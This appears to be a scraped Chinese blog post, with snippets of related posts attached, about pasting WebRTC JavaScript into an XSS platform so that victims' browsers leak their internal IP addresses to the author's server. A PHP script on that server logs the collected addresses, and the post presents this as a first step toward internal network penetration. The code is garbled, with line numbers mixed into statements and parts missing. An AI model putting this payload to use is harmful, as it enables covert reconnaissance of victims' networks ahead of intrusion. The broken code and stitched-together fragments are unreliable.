前提得瀏覽器支援webrtc,測試的時候google瀏覽器測試成功,火狐瀏覽器不支援webrtc,
再在xss平台直接複製如下js**:
1在谷歌瀏覽器看控制台資訊,已經將內網ip傳送給伺服器了。function
form_ip(ip,port)
8function
getips(callback);
10var rtcpeerconnection =window.rtcpeerconnection
11 ||window.mozrtcpeerconnection
12 ||window.webkitrtcpeerconnection;
13var mediaconstraints =]
15};
16var servers =undefined;
17if
(window.webkitrtcpeerconnection)
18 servers =;
19var pc = new
rtcpeerconnection(servers, mediaconstraints);
20 pc.onicecandidate = function
(ice)(\.[0-9]))/
23var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
24if(ip_dups[ip_addr] ===undefined)
25callback(ip_addr);
26 ip_dups[ip_addr] = true;27
}28};29 pc.createdatachannel("");
30 pc.createoffer(function
(result));
3233 }, function
(){});
34}//通過weprtc獲取內網ip
35 getips(function
(ip)
47 });
這裡是我伺服器的ip.伺服器接受的**是:
1下面是伺服器接受到的ip:<?php
2$ip=$_request['ip'];
3$port=$_request['port'];
4$myfile=fopen("ip.txt","a");
5fwrite($myfile,$ip.':'.$port.' ');
6fclose($myfile
);7 ?>
接下來就是可以內網滲透了。
前端獲取內網IP
個人blog,歡迎關注加收藏 定義函式 獲取內網ip getips if 1 window.mozrtcpeerconnection rtc.onicecandidate function evt rtc.createoffer function offerdesc function e var a...
ansible 獲取內網 IP
由於線上機器是多家廠商的且網絡卡會有公網ip和內網ip都繫結情形,並且有些服務必須保證監聽內網ip,但在host清單檔案配置中有可能是內網ip,也有可能是公網ip。使用 變數 會獲取機器所有ip,但沒有排序 使用 變數 則是網絡卡預設ip,經驗證此時有可能是內網ip也有可能是公網ip 安裝 neta...
Linux shell 獲取內網ip 終極方法
machine physics net ls sys class net grep v ls sys devices virtual net local ip ip addr grep machine physics net awk 0 9 inet.global 在部署的時候需要獲取內網ip ip...